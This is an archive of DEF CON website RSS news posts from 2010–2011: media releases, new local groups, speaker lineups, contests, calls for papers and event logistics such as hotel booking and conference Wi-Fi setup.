https://www.defcon.org/defconrss.xml It seems Santa has been in our servers, (I don't know how he does it, he must be 1337) and has left you a special gift! The Speaker & Slides video, as well as the Audio from DEF CON 19 is now live and awaiting your downloading pleasure. You can find them on the DEF CON 19 Archive page, or on the following RSS Feeds: https://www.defcon.org/podcast/defcon-19-video.rss https://www.defcon.org/podcast/defcon-19-audio.rss As 2011 winds down, we're working hard behind the scenes for a spectacular 20th anniversary of DEF CON in 2012! So keep your eyes on the DEF CON Facebook, Twitter, RSS Feed, or defcon.org for all the info as it happens! Enjoy!

==> Welcome New DEF CON Groups!

https://www.defcon.org/defconrss.xml We'd like to welcome the following new groups to the DCG fold! Domestic DC317 - Indianapolis, IN DC614 - Columbus, OH DC765 - Lafayette, IN DC909 - Pomona, CA International DC00497151 - Stuttgart, Germany DC00977 - Lalitpur, India DC02139 - Kiev, Ukraine DC110006 - Delhi, India DC15033 - Casale Monferrato, Italy DC560001 - Bengaluru, India DC636 - Mexicali, Baja California, Mexico DC700077 - Kolkata, Westbengal, India DC880 - Dhaka, Bangladesh DC91022 - Mumbai, India DC91361 - Guwahati, India You can find out more about DEF CON Groups on the DCG FAQ, or follow DCG happenings on Facebook!

==> Christmas Deal on DEF CON 19 DVD Sets From TSOK!

https://www.defcon.org/defconrss.xml If you're looking for the perfect Hacker gift, you can purchase the full DVD sets from DEF CON 19 from The Source of Knowledge at discounted prices up through Christmas Eve!

==> Hacker Jeopardy, Hacker Pyramid and Closing Ceremonies Video!

https://www.defcon.org/defconrss.xml Even though Halloween has come and gone, we have some tasty video treats for your viewing pleasure! Check out the videos from 10,000 Hacker Pyramid, Hacker Jeopardy, and the DEF CON 19 Closing Ceremonies, and you can enjoy or re-live some of the fun we had at DEF CON 19! 10,000 Hacker Pyramid and Hacker Jeopardy - Friday Night 10,000 Hacker Pyramid and Hacker Jeopardy - Saturday Night DEF CON 19 Closing Ceremonies

==> DEF CON 19 Video is Live!

https://www.defcon.org/defconrss.xml At long last, we would like to present the DEF CON 19 video presentations (slides w/ audio of the talk) for your viewing enjoyment! You can access them on the DEF CON 19 Archive page, or on the RSS Feed at https://www.defcon.org/podcast/defcon-19-slides.rss!

==> Welcome New DEF CON Groups!

https://www.defcon.org/defconrss.xml A big welcome to the most recent additions to DEF CON Groups! Domestic 402 - Omaha, NE 410 - Baltimore, MD 509.1 - Spokane, WA 702 - Las Vegas, NV 801 - Salt Lake City, UT 805 - Thousand Oaks, CA International 003348 - Presidencia Roque Sáenz Peña, Chaco, Argentina 0101 - Bogotá, Colombia 0131 - Casale Monferrato, Italy 0497 - Kerala, India 303002 - Jaipur, India 6221 - Jakarta, Indonesia 9180 - Bangalore, Karnataka, India 91824 - Mangalore, Karnataka, India 941 - Colombo, Sri Lanka 9663 - Dhahran, Saudi Arabia To find the DEF CON Group in your area check out the DCG Listing Page. If there isn't one, you can start one! Check out the DCG Point of Contact FAQ for details.

==> Download the DEF CON 19 DVD!

https://www.defcon.org/defconrss.xml We have posted the DEF CON 19 DVD content on media.defcon.org in two .iso images, one is the original DVD distributed at the show, and the other contains all the same content, but with the updated slide decks from the speakers. Download them at the following links: https://media.defcon.org/dc-19/defcon-19-dvd-original.iso (~1.6 GB) https://media.defcon.org/dc-19/defcon-19-dvd-updated.iso (~1.7 GB) Enjoy!

==> Press Page updated for DEF CON 19!

https://www.defcon.org/defconrss.xml Check out the DEF CON Press Archive or the DEF CON 19 Archive page to see what the top stories of DEF CON 19 were all about! We hear we will be receiving the audio and slide video from DC19 soon, so keep your eyes on our Twitter and Facebook pages for the heads up when we get it posted!

==> Contest Results Page is Up!

https://www.defcon.org/defconrss.xml Check out the results of many of the innovative and challenging contests that occurred at DEF CON 19. If you ran a contest and would like the results posted, email them to neil [at] defcon ]dot[ org and we'll get them up!

==> New Presentation Materials RSS Feed

https://www.defcon.org/defconrss.xml Many of you know about our Archive Page, recently we uploaded all the presentation materials from DEF CON 19. The thought occurred to us, what if you want to download them all at once and in an attractive RSS? So we made one. Not all presentations have PDF enclosures but we wanted to be complete and list every abstract and Bio we had for our speaker roster. As soon as we can encode and post the Audio and Video RSS we will, in the meantime, enjoy the DEF CON 19 Materials. Join the discussion thread on the DEF CON Forums: https://forum.defcon.org/forumdisplay.php?f=611. Don't forget to join our Facebook page www.facebook.com/defcon to get involved as well.

==> The DEF CON 19 Archive Page is up, slides posted!

https://www.defcon.org/defconrss.xml Head on over to the DEF CON 19 Archive page, where you can find the slides submitted for this year's talks! You can also download a copy of the Program guide. Keep an eye on this page for updates in the coming weeks, including press, video, audio, music and other great stuff from DEF CON 19!

==> Thanks for a Great Con!

https://www.defcon.org/defconrss.xml Well another DEF CON has come and gone, and was it ever a great one! We'd like to give a huge shout out to all of you who attended and made it all worthwhile! Big thanks to all of the speakers, workshop instructors, contest/event & village organizers, and vendors who provide so much awesome content for this con! Not to mention the multitudes of goons who make it all run like a well-oiled machine, as well as the fantastic staff at the Rio who went above and beyond for this unknown (to them) and crazy group of 11-12 thousand hackers! We are still reeling that the first year in a new hotel ran so smoothly! We're back in the saddle now after a little much needed R&R, so you can expect the content, press, contest results, and highlights to start rolling in over the next few days and weeks. In fact, it seems like the planning crew is already psyched and bursting at the seams with great ideas for next year, our 20th anniversary! Expect it to be epic! Keep your eyes on the DEF CON RSS, Twitter and Facebook pages for the latest updates as they roll in. Also check out the DEFCON 19 and Beyond Forum on the DEF CON Forums for all of the discussions about this year's show!

==> Huge Speaker Update!

https://www.defcon.org/defconrss.xml Here are 46 more reasons to be at DEF CON 19! Read On...

==> DEF CON Workshops are Live!

https://www.defcon.org/defconrss.xml New for Def Con 19, Workshops extends the experience of learning to the classroom. Take your time and get it right by getting some hands-on time with hardware, software, and picking the minds of some of the most interesting hackers in their fields. Bring your thinking cap and get ready to be schooled. Read On...

==> The DEF CON Awards!

https://www.defcon.org/defconrss.xml New, for DEF CON 19 - the DEF CON Awards! DEF CON introduces the DEF CON Awards to recognize people/projects/companies for their competence (or lack thereof) in the hacking or security world. Nominations will be accepted for the categories below until July 6th, 2011. Voting will be conducted online for three of the categories from July 8th - July 29th, 2011 (voting link will be provided at a later time). Do you have a favorite hacker oriented author that best represents the hacker lifestyle and scene? Do you have inside knowledge of the most interesting malware to hit the net this year? Or was there a media outlet that best represents the WORST in coverage of real news concerning hackers or security topics? Now's your chance to have a voice. Get your nominations in today, and give credit where credit is due. Be sure to provide supporting information, such as links to websites, news articles, or software. Turn in your nominations here: http://www.surveymonkey.com/s/2JDHC23

==> So Many Speakers!

https://www.defcon.org/defconrss.xml Take a minute to peruse this fantastic set of additions to the DEF CON 19 line-up! Fingerbank — Open DHCP Fingerprints Database Olivier Bilodeau PacketFence, The Open Source Nac: What We've Done In The Last Two Years Olivier Bilodeau Kinectasploit: Metasploit Meets Kinect Jeff Bryner Metasploit vSploit Modules Marcus J. Carey and David Rude Look At What My Car Can Do Tyler Cohen VDLDS — All Your Voice Are Belong To Us Ganesh Devarajan and Don LeBert Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston, Josh Abraham, and Kevin Johnson Handicapping the US Supreme Court: Can We Get Rich by Forceful Browsing? Foofus Strategic Cyber Security: An Evaluation of Nation-State Cyber Attack Mitigation Strategies Kenneth Geers Smartfuzzing the Web: Carpe Tuorum Foramina Nathan Hamiel, Gregory Fleischer, Justin Engler, and Seth Law Economics of Password Cracking in the GPU Era Robert "Hackajar" Imhoff-Dousharm Battery Firmware Hacking Charlie Miller Big Brother on the Big Screen: Fact/Fiction? Nicole Ozer Archive Team: A Distributed Preservation of Service Attack Jason Scott Insecurity: An Analysis Of Current Commercial And Government Security Lock Designs Marc Weber Tobias, Matt Fiddler, and Tobias Bluzmanis DIY Non-Destructive Entry Schuyler Towne Seven Ways to Hang Yourself with Google Android Jacob West and Yekaterina Tsipenyuk ONeil Key Impressioning Jos Weyers Phishing and Online Scam in China Joey Zhu Vanquishing Voyeurs: Secure Ways To Authenticate Insecurely Zoz and Andrea Bianchi

==> New Talks

https://www.defcon.org/defconrss.xml Here's another bundle of talks to whet your appetite for DEF CON Madness! More to come in the next couple days! (Read on...)

==> Talks Keep on Coming!

https://www.defcon.org/defconrss.xml Another batch of fine DEF CON content has been added to the mix! Check out newest additions to our line-up! The Art and Science of Security Research Greg Conti Internet Kiosk Terminals : The Redux Paul Craig Introduction to Tamper Evident Devices datagram Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests Rob Havelt and Wendel Guglielmetti Henrique Sounds Like Botnet Itzik Kotler and Iftach Ian Amit Panel: Is it 0-day or 0-care? Jake Kouns, Brian Martin, Steve Christey, Carsten Eiram, Art Manion, Dan Holden, Alex Hutton and Katie Moussouris Vulnerabilities of Wireless Water Meter Networks John McNabb Blinkie Lights: Network Monitoring with Arduino Steve Ocepek My password is: #FullOfFail! — The Core Problem with Authentication and How We Can Overcome It Jason M. Pittman Mobile App Moolah: Profit taking with Mobile Malware Jimmy Shah Weaponizing Cyberpsychology and Subverting Cybervetting for Fun, Profit and Subterfuge Chris "TheSuggmeister" Sumner and alien Staring into the Abyss: The Dark Side of Crime-fighting, Security, and Professional Intelligence Richard Thieme

==> DC19 CTF Quals Update!

https://www.defcon.org/defconrss.xml Another DEF CON CTF Qualification round has passed, and with it 12 teams will ascend to their slots in the DEF CON 19 Capture the Flag Competition. The qualifying teams have not been posted just yet, so keep an eye on ddtek.biz for the winners, and we'll announce them as well when we have the results. For now, we have collected as many write-ups as we could find from this year's Quals for your consumption! (Read on...)

==> More Speakers Posted!

https://www.defcon.org/defconrss.xml Another poppin' fresh batch of speakers is now live on the speaker page. Here's a handy list of the new offerings! Bosses love Excel, Hackers too. Chema Alonso and Juan Garrido "Silverhack" Three Generations of DoS Attacks (with Audience Participation, as Victims) Sam Bowne Familiarity Breeds Contempt Sandy "Mouse" Clark and Brad "RenderMan" Haines Cipherspaces/Darknets: An Overview Of Attack Strategies Adrian Crenshaw "Irongeek" Speaking with Cryptographic Oracles Daniel Crowley Smile for the Grenade! "Camera Go Bang!" Vlad Gostom and Joshua Marpet Assessing Civilian Willingness to Participate in On-Line Political and Social Conflict Thomas J. Holt and Max Kilger Hacking and Securing DB2 LUW Databases Alexander Kornbrust PIG: Finding Truffles Without Leaving A Trace Ryan Linn Hacking .Net Applications: The Black Arts Jon McCoy Safe to Armed in Seconds: A Study of Epic Fails of Popular Gun Safes Deviant Ollam Port Scanning Without Sending Packets Gregory David Pickett

==> CTF Qualification Round Begins Tomorrow!

https://www.defcon.org/defconrss.xml You only have a few scant hours left (00:00:00 UTC) to register for the DEF CON 19 CTF Quals, which begin tomorrow at 19:00:00 UTC. This is the event that separates the hackers from the kiddies, to send the top 12 teams to battle for the glory that comes with winning a DEF CON Capture the Flag Competition. Register and get all the info at http://ddtek.biz!

==> New Contests and Events!

https://www.defcon.org/defconrss.xml Check out a few of the new contests and events coming to DEF CON 19! DEF CON Beard & Moustache Championships Due to the growing number of awesome beards at DEFCON and the (popularity?) of the shitshow that is beardsmanship, it's time that folks were recognized for letting their unix beards fly. DEF CON Radio Defcon Radio will be streaming live radio action 24/7 during the con. Speaker interviews, news, party coverage...correspondents will crawl the trenches of con to bring you entertainment. Are you not entertained? DEF CON Bike Rent bicycles, hire a guide, and endure a 2 Hour bike ride in the Las Vegas heat! Got Water? Forensics Contest The Network Forensics Puzzle Contest is a challenging mystery requiring contestants to forensically analyze packet captures (and more!) to uncover an evil plot.

==> DEF CON 19 Artwork Contest and Short Story Contest is Open!

https://www.defcon.org/defconrss.xml The DEF CON Artwork Contest is again underway! This year's theme is reminiscent of those 60's and 70's spy movies and TV shows like "The Man from U.N.C.L.E", "Our Man Flint", and "James Bond", with a hacker angle and a little grit. We have dubbed this theme "Haxploitation". (Read on...) For the writers, the DEF CON 19 Short Story contest is also open, and similar themed. Find out about it at https://forum.defcon.org/showthread.php?t=12153

==> Time Grows Short.

https://www.defcon.org/defconrss.xml Hola friends! This is just a reminder that deadlines are looming. The Call for Papers ends May 27th, so if you're planning to submit a talk you have just over a week to put that proposal together! Find the CFP Announcement at https://www.defcon.org/html/defcon-19/dc-19-cfp.html, and the Call for Papers form at https://www.defcon.org/html/defcon-19/dc-19-cfp-form.html. Also looming is the deadline for the DEF CON 19 Contest/Event RFI. June 1st is when you need to have your proposal for the latest great or time tested contest or event submitted to Pyr0. You can find the RFI at https://forum.defcon.org/showthread.php?t=12113. Good luck and remember: DEF CON is what you make it.

==> New DEF CON 19 Site, Speakers Up.

https://www.defcon.org/defconrss.xml Check out the spankin new site for DEF CON 19! Have a look around, see what's new, and while you're at it, check out the first batch of Speakers! Deceptive Hacking: How Misdirection Can Be Used Steal Information Without Being Detected Bruce "Grymoire" Barnett Abusing HTML5 Ming Chow Mamma Don't Let Your Babies Grow Up to be Pen Testers - (a.k.a. Everything Your Guidance Counselor Forgot to Tell You About Pen Testing) Dr. Patrick Engebretson and Dr. Josh Pauli Getting F*cked On the River Gus Fritschie and Mike Wright Jugaad – Linux Thread Injection Kit Aseem "@" Jakhar Black Ops of TCP/IP 2011 Dan Kaminsky Hacking Your Victims Over Power Lines Dave Kennedy (ReL1K) DCFluX in: License to Transmit Matt Krick "DCFluX" Balancing The Pwn Trade Deficit – APT Secrets in Asia Anthony Lai, Jeremy Chiu and PK Covert Post-Exploitation Forensics With Metasploit Wesley McGrew VoIP Hopping the Hotel: Attacking the Crown Jewels through VoIP Jason Ostrom Getting SSLizzard Nicholas J. Percoco and Paul Kehrer This is REALLY not the droid you're looking for... Nicholas J. Percoco and Sean Schulte WTF Happened to the Constitution?! The Right to Privacy in the Digital Age Michael "theprez98" Schearer Runtime Process Insemination Shawn Webb Staying Connected during a Revolution or Disaster Thomas Wilhelm Network Application Firewalls vs. Contemporary Threats Brad Woodberg As always, stay tuned to our Twitter, RSS Feed, or Facebook page for all the news as it happens!

==> DEF CON 19 Contest/Event RFI is Live!

https://www.defcon.org/defconrss.xml PyrØ Has posted the DEF CON 19 Contest & Event Request for Information on the DEF CON Forums. If you have, or are currently thinking about running a contest or an event at DEF CON, this is the info you need to be considered for space, power and network connectivity! Submit your contest data by filling out the form at the bottom. Here's a big shout out to Deviant Ollam for being on top of things and being the first to submit an RFI for the Beverage Cooling Contraption Contest!

==> DEF CON 19 Call for Music!

https://www.defcon.org/defconrss.xml Are you a Band or a DJ who wants to perform at DEF CON 19? Then answer the Call for Music freshly posted by DJ Great Scott! You can check out the write-up at https://forum.defcon.org/showthread.php?p=119223 as well as download the application! Hurry up and apply, as the Deadline is Sunday May 15! Good luck!

==> DEF CON 19 Call for Workshops!

https://www.defcon.org/defconrss.xml Are you a leader, 'leet hacker, a ninja in your field? Do you have a passion to teach and share your knowledge? Got something interesting you are dying to talk about? We're looking for workshops from people like you. If you are interested in being part of the very first ever DEF CON Workshop team, submit now! (Read on...)

==> DEF CON 19 News! Pool Hijinks, CTF Quals, and Evidence Tampering

https://www.defcon.org/defconrss.xml Here's what's going on in the world of DEF CON: The Pool Is Open! Bring your suits and stow your tech, because poolside shenanigans in the wee hours are coming back to DEF CON! This year we will have 24hr pool access to Pool 4 (pictured) at the Rio! We're not even April foolin! DDTek Announces CTF Quals! It's that time again, and your first step to joining the ranks of leetness that can only come from a win in the DEF CON Capture The Flag. That's right, DDTek has announced the qualification round for the 2011 DEF CON CTF! Tamper Evident Returns! DT's Tamper Evident Contest is coming back this year with some new surprises. It might be time to brush up on your super sneaky methods for opening things you aren't supposed to, and keep your eye on the Tamper Evident Forum for details as they surface. Stay tuned to our Twitter, RSS Feed, or Facebook page for all the news as it happens!

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Feast your eyes on a new Speaker's Corner by Jack Daniel, which gives you some great tips if you are thinking about submitting a talk for DEF CON!

==> DEF CON 18 Video+Slides returns!

https://www.defcon.org/defconrss.xml We have re-loaded the original videos we posted from DEF CON 18 featuring video of the speaker and video of the slides! Check out the Video RSS Feed or on iTunes and enjoy!

==> The DEF CON 19 Call for Papers is Now Open!

https://www.defcon.org/defconrss.xml More exciting than HBGary's email, world's #1 hacker expose or 5up3r $3kret.gov leak, it is time for the DEF CON Call for Papers to open! What: DEF CON 19 Call For Papers When: The Call for Papers will close on May 27th, 2011 How: Complete the Call for Papers Form and send to talks at defcon dot org DEF CON will take place at the Rio in Las Vegas, NV, USA, August 4 - August 7th, 2011. Read the full announcement at https://www.defcon.org/html/defcon-19/dc-19-cfp.html

==> Contests and Events we'll see at DEF CON 19!

https://www.defcon.org/defconrss.xml Below you'll find a list of some of the fantastic contests and events that have announced intent to return for DEF CON 19! This is not by any means a complete list, and will be growing as planning continues. Artwork Contest(s): No Posts Be The Match Foundation - Bone Marrow Drive: Forum Active Beverage Cooling Contraption Contest: No Posts CTP: Capture the Packet: No Posts Crack Me If You Can: Forum Active Dark Tangent's Tamper Evident Contest: Forum Active DC101: Forum Active DEF CON Geo Challenge: No Posts DEF CON Shoot: Forum Active DEF CON Social Engineering CTF: No Posts Goon Band -- Recognize: No Posts Hacker Karaoke: No Posts Ham license exams: No Posts Lockpicking Contests: No Posts Open CTF: No Posts Scavenger Hunt: No Posts The Summit EFF Fundraiser: No Posts Toxic BBQ: No Posts Wall of Sheep: No Posts In case you didn't know, most of these contests and events started unofficially, with a great idea and some devotion, by attendees who just wanted to do something cool. Yes friend, that means you could be creating the next big DEF CON contest or event! Post your vision to the New Ideas section of the DEF CON Forums, and see what kind of response you get!

==> Rio Registration is Live for DEF CON 19!

https://www.defcon.org/defconrss.xml Here's something for all of you early birds! The DEF CON 19 group room registration at the Rio is now live! The room rates are $99 Sunday thru Thursday and $112 per night on Friday and Saturday. The group rates are valid Monday August 1 to Friday August 12. You may either follow this link: http://www.harrahs.com/CheckGroupAvailability.do?propCode=RLV&groupCode=SRDEF11 Or call the Rio toll free at 1-888-746-6955 and refer to group code: SRDEF11

==> DEF CON Groups News

https://www.defcon.org/defconrss.xml Happy 2011 from DEF CON! DEF CON Groups is undergoing some administrative changes heading into the new year, and we'd like to let you know that long time Goon and friend of DEF CON, Converge, has graciously stepped up to take the reins as DEF CON Groups Coordinator! If you currently run a DCG and want to update your info on the site, or if you are interested in starting a new DCG, you can contact him at dcgroups at defcon dot org. We'd like to extend a big welcome to the following new groups! DC334.1 Montgomery, AL DC808.2 Ewa Beach, HI DC9723 Tel-Aviv, Israel DC1020 Eckental, Germany DC281 Houston, TX Keep an eye open for more from the DEF CON Groups in 2011!

==> Stop. Think. Connect. A Special DHS, PSA Contest

https://www.defcon.org/defconrss.xml Howard Schmidt, Special Assistant to the President and Cyber Security Coordinator has issued a special PSA Contest. This crowd sourcing campaign is in an effort to alert the general public to Stop, Think, then connect, when it comes to their online presence and responsibility. Good, Bad, or otherwise, I would really like to see what the DEF CON community came up with. I am confident that our DEF CON community could come up with some pretty interesting feedback in regards to this contest, I'd love to see and hear the creative ways you would advertise to the general public. I can only imagine the hilarity that would ensue in a minute for a video entitled "How to not be a Noob" or "Phishing & Trolling, not what it was in Grandpa's day." Overall, I have had a love for PSA's since I was a kid. A lot of us remember and have a special place in our hearts for the PSA's of our youth, especially ones of the "The More you Know" variety. Who didn't like watching "This is your Brain on Drugs" or GI JOE telling us that bullying is wrong? I know I did, and "Knowing is Half the Battle". From the contest: "Keeping the Internet safe is a responsibility we all share. We need to take time to stop and think before we connect to the Internet, share information online, or participate in online communities. But sometimes, a creative and compelling reminder can help. That's why the Department has kicked-off the Stop. Think. Connect. PSA Challenge because all Americans have an important role to play in securing the Internet. We are looking for videos that will help educate Americans about Internet safety and what we can all do to protect ourselves and our families online. If you know what it takes to get Americans motivated to improve their safety online, then we need your help. We want videos that inspire Americans to Stop. Think. Connect."
For details on the requirements and how to submit visit the contest page at: http://www.dhs.gov/files/events/stop-think-connect-psa-challenge.shtm PSAs must include at least one of the following Internet safety tips:
* Keep a Clean Machine
* Protect Your Personal Information
* Connect with Care
* Be Web Wise
* Be A Good Online Citizen
In similar fashion, I'd love to see if anyone out there posts something on:
* Understanding Encryption
* Surfing Anonymously
* Using Proxy Servers or Feed Over Email
* Understanding Copyright, TOS agreements, and Privacy expectations.
* Who and What is a Troll and how to defeat them.
This past year we had a few talks both in the offense and defense perspectives, check them out on the DC 18 archive, there are too many that fit this topic to list, you might find something that inspires you. I hope you guys & gals out there send in a submission, if you don't want to submit to the official contest, can you send us a link instead? These PSAs would be great to show at DEF CON 19, and if we can, we'd probably like to share some of your clips online so we can get the word out to "Stop. Think. Connect" The contest runs until Feb 14th, Valentine's Day, so send in your love, send us links, let's get this PSA party started. Good luck! Nikita @niki7a on twitter. Nikita@Defcon.org

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Jack Daniel discusses PCI and the hacker community in a new Speaker's Corner entitled "How Did We End Up Like This?"

==> Video is Back!

https://www.defcon.org/defconrss.xml Video is back up and running! These versions differ from the ones we removed, they are video of the slides only with audio of the talk. You can find them on the Video RSS Feed or on the DEF CON 18 Archive Page!

==> Hacker Jeopardy Slides + Audio

https://www.defcon.org/defconrss.xml Here's a tasty morsel for you, slide video with audio of this year's Hacker Jeopardy! We don't often see this, so if you're interested in playing next year or just want to get an idea of what it's about, this is a great resource! DEF CON 18 Hacker Jeopardy - Friday Part 1 DEF CON 18 Hacker Jeopardy - Friday Part 2 DEF CON 18 Hacker Jeopardy - Saturday Part 1 DEF CON 18 Hacker Jeopardy - Saturday Part 2

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the new Speaker's Corner by the Suggmeister, the follow-up to his "Experiences of a First Time DEF CON Speaker" article before DEF CON 18!

==> Video Update

https://www.defcon.org/defconrss.xml The videos have been taken down for a week or two, as we worked a little too fast to get them up and the production company wasn't ready to release them. We will have slides+audio versions of the videos up and online within the next two weeks, once we receive the right versions and process. Thanks for your patience, and stay tuned to our Twitter, RSS Feed, or Facebook page for the announcement when they go back up!

==> DEF CON 18 Talks - Video is Live!

https://www.defcon.org/defconrss.xml DEF CON 18 talks with the speaker video and slides has been processed and posted! Check 'em out on the Video RSS Feed or on the DEF CON 18 Archive Page!

==> DEF CON 18 Talks - Audio is Live!

https://www.defcon.org/defconrss.xml That is correct folks! You can now listen to all of the awesome DEF CON 18 Talks in .m4b Audiobook format! You can find them on the Audio RSS Feed or on the DEF CON 18 Archive Page! Video is on the way, look for it soon! You can know about it the minute it goes live by keeping up with the DEF CON Facebook page or @_defcon_ on Twitter!

==> DEF CON 18 Tools Page Updated!

https://www.defcon.org/defconrss.xml Swing by the Tools Released page and have a look at all the tools released at DEF CON 18! There are local copies, if available, for your convenience, and links to the project homepages as well!

==> DEF CON 18 Music is posted!

https://www.defcon.org/defconrss.xml That's right, you can now download the sets from The Cyberpunk Gala and the poolside action at https://www.defcon.org/podcast/defcon-18-music.rss! The Zombie Ball is having some technical difficulties but should be up soon as well! We will also have video of the music sets soon as well, so keep an eye peeled.

==> DC18 Contest Results and New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the DEF CON 18 Contest results page for the results of the contests we have received so far! If you ran a contest and have results for us, send them in! We also have a new Speaker's Corner from Schuyler Towne, discussing his secret agenda for locksport! Music sets from the pools and the bleep at DEF CON 18 are being processed, look for it to be posted next week!

==> More DEF CON 18 Press!

https://www.defcon.org/defconrss.xml We've updated the press page with even more DEF CON 18 coverage! Most of the new stuff can be found in the "Other" Category, and in a new category called "Video Coverage" which contains recaps, badge hacks, goon hijinks and more! Check them out on the Press Page, or the DEF CON 18 Archive Page!

==> DEF CON 18 Press And Early Video!

https://www.defcon.org/defconrss.xml Hey everyone! The Press Page and the DC 18 Archive Page have been updated with a ton of stories covering DEF CON 18! Not only that, but we have uploaded the first early release video (slides w/ audio) of a few of the talks, including: DEFCON 18 Hacking Conference Presentation By Joe Grand and Dark Tangent - Welcome And Behind The Scenes Of The DEFCON Badge - Slides.m4v DEFCON 18 Hacking Conference Presentation By Barnaby Jack - Jackpotting Automated Teller Machines Redux - Slides.m4v DEFCON 18 Hacking Conference Presentation By David Maynor and Paul Judge - Searching For Malware - Slides.m4v DEFCON 18 Hacking Conference Presentation By Chris Paget - Practical Cellphone Spying - Slides.m4v DEFCON 18 Hacking Conference Presentation By Md Sohail Ahmad - WPA Too! - Slides.m4v Enjoy! The rest of the audio and video will be up in a couple of months, but for now, enjoy these tasty nuggets of DEF CON goodness!

==> DEF CON 18 Archive Page is Live!

https://www.defcon.org/defconrss.xml The DEF CON 18 Archive Page is up and running! Currently, we have all of the presentation slides, white papers and extras posted, as well as the DEF CON 18 Program in pdf format! Coming in the next week or so we'll have contest results, press, and even a few early release videos! So check it out and begin reliving the glory that was DEF CON 18!

==> DEF CON 18 Post Con Update

https://www.defcon.org/defconrss.xml DEF CON 18 was a resounding success! With more contests, events, attendance and talks, this year's show was a fitting end to our years at the Riviera! We'd like to thank the Riv for working with and hosting us for 5 awesome years! We'd also like to thank all the folks who sacrificed time, effort, and resources to contribute to the hacking community, as well as a huge thank you to all the attendees for showing up and learning, growing and participating in all this con has to offer! We've all had a chance to wind down and decompress from all the excitement of DEF CON 18, and all of the results, press, photos, updated materials and other content is rolling in. Starting in the next couple of days and through the next few weeks, we'll be posting all of this info for everyone to enjoy, reflect upon, and learn from. Keep your eyes on defcon.org, the DEF CON RSS feed, our Twitter and Facebook for all the latest updates from the show!

==> PhD Dissertation Study in the Contest Area

https://www.defcon.org/defconrss.xml Take a short survey at the table next to the Info booth in the Contest Area to participate! Here's more info: The US electricity infrastructure relies on Industrial Control Systems (ICS) for better efficiency and reliability. However, these systems are susceptible to cyberattacks, which may disrupt essential power services. How cybercriminals rationalize target selection and attack technique is vital in offering a more comprehensive picture of ICS vulnerabilities, cybercrimes, and security. This Rutgers School of Criminal Justice PhD dissertation research project will survey both ethical hackers and industry representatives. It will assess their views on cybervulnerabilities of the electricity sector's ICS to identify any gaps in their perceptions.

==> New Speakers Corner!

https://www.defcon.org/defconrss.xml Craig Heffner discusses hacking millions of routers and his upcoming talk tomorrow in a new Speaker's Corner!

==> Be the Match at DEF CON

https://www.defcon.org/defconrss.xml Be The Match offers the unique opportunity for you to give a life-saving marrow transplant to someone in need. Thousands of patients with leukemia and other life-threatening diseases depend on the Be The Match Registry, the largest and most diverse registry in the world, to find a life-saving donor. The more potential donors that step forward, more resources are available to patients and more lives can be saved. Description of the donor recruitment drive: Be The Match will have a booth at DefCon 18 where individuals can register to be part of the Be The Match Registry. All they need to be is between the ages of 18 and 60, meet the health guidelines and be willing to donate to ANY patient in need. At the recruitment drive, you will fill out a consent form with contact information and a short medical evaluation. You will receive more information about what it means to be a donor and then you will swab the inside of your cheeks. Your tissue type will be listed in the Be The Match Registry until your 61st Birthday. If you are a match for someone in need, then you will be contacted for donation.

==> DEF CON 18 Secure Wifi

https://www.defcon.org/defconrss.xml This year we are offering 802.1x/WPA-encrypted wireless access for Internet access. In order to access the "DefCon-Secure" wireless network, you will need to create login information for yourself. We have set up a self-registration website. https://wifireg.defcon.org Go to this site to register a username & password. You can hit it from your phone, WWAN, or the open DefCon wireless. We have also included a copy of the SecureTrust CA root certificate in case your device does not have it in its default certificate trust chain (many systems do, some do not).
SSID: DefCon-Secure or DefCon-SecureA for 5.0GHz devices (iPad, newer Macbooks)
Network Authentication: WPA2
Data encryption: TKIP or AES
Authentication EAP Type: PEAP
Authentication Mechanism: EAP-MSCHAP v2

==> More New Speaker's Corner!

https://www.defcon.org/defconrss.xml The Suggmeister provides some insight into the genesis of a talk as a new speaker in this new Speaker's Corner!

==> New Speaker's Corner

https://www.defcon.org/defconrss.xml Matt Ryanczak Talks about IPv6 and the future in this all new Speaker's Corner!

==> Another New Speaker's Corner

https://www.defcon.org/defconrss.xml Tips for getting the most out of your DEF CON experience are discussed in this Speaker's Corner by Nicholas Percoco entitled "Packing It All In"!

==> New Speaker's Corner

https://www.defcon.org/defconrss.xml Lockpick shapes are de-mystified in this part one of a new Speaker's Corner by Schuyler Towne entitled "What's This Lockpick For?"!

==> The Heat is On!

https://www.defcon.org/defconrss.xml There's a ton happening leading up to DEF CON 18 in just twelve more days! The Mystery Challenge is heating up! Check out the Mystery Challenge forum for the latest hijinks! We have some bad news, unfortunately the Geo Challenge will not be happening this year. You can read more about this on the Geo Challenge forum. Our sympathy goes out to the organizers for what promised to be a great contest. Definitely look for it next year! There are some exciting new offerings that have surfaced recently! Among them are: Dark Tangent is busting out the Tamper Evident Contest, in which you debunk the phrase "Impossible to reseal or re-use", and document how you did it! The Backdoor Hiding Contest, in which you test your skills at hiding and finding backdoors. Capture the Packet is a cool new network scavenger hunt. Look for clues, solve puzzles and win prizes! Crack Me If You Can: 53,000 password hashes, 48 hours, nuff said! PCB PWNage is a mini contest from the Hardware Hacking Village to find out who can design the coolest PCB! The Twitter Hunt: Follow @TheSuggmeister and watch for the clues that lead to prizes! For all the latest info on contests and events at this year's DEF CON, check out the DEF CON Forums!

==> DEF CON 18 Artwork Contest Winners!

https://www.defcon.org/defconrss.xml Congratulations to the Winners of the DEF CON 18 Artwork Contest! We had a bunch of great entries this year, but we could only pick a few! First Place and People's Choice vote win goes to "18 & Legal" by Mar! Second place goes to "DEF CON Boy" by oshu! Third goes to "Her" by emtag! Congrats to all the winners and a big thanks to all who entered! To view and download all the wallpapers from this year's contest go to the DEF CON 18 Artwork Contest Public Gallery!

==> Artist pages are live!

https://www.defcon.org/defconrss.xml You can now view all the bios and samples from the killer line-up of artists performing at DEF CON this year! Check them out on the Entertainment page.

==> DEF CON 18 Speaking Schedule is Live!

https://www.defcon.org/defconrss.xml Do we need to say much more than that? Check out the DEF CON 18 Speaking Schedule.

==> The DC 18 Speaker List Is Still Growing!

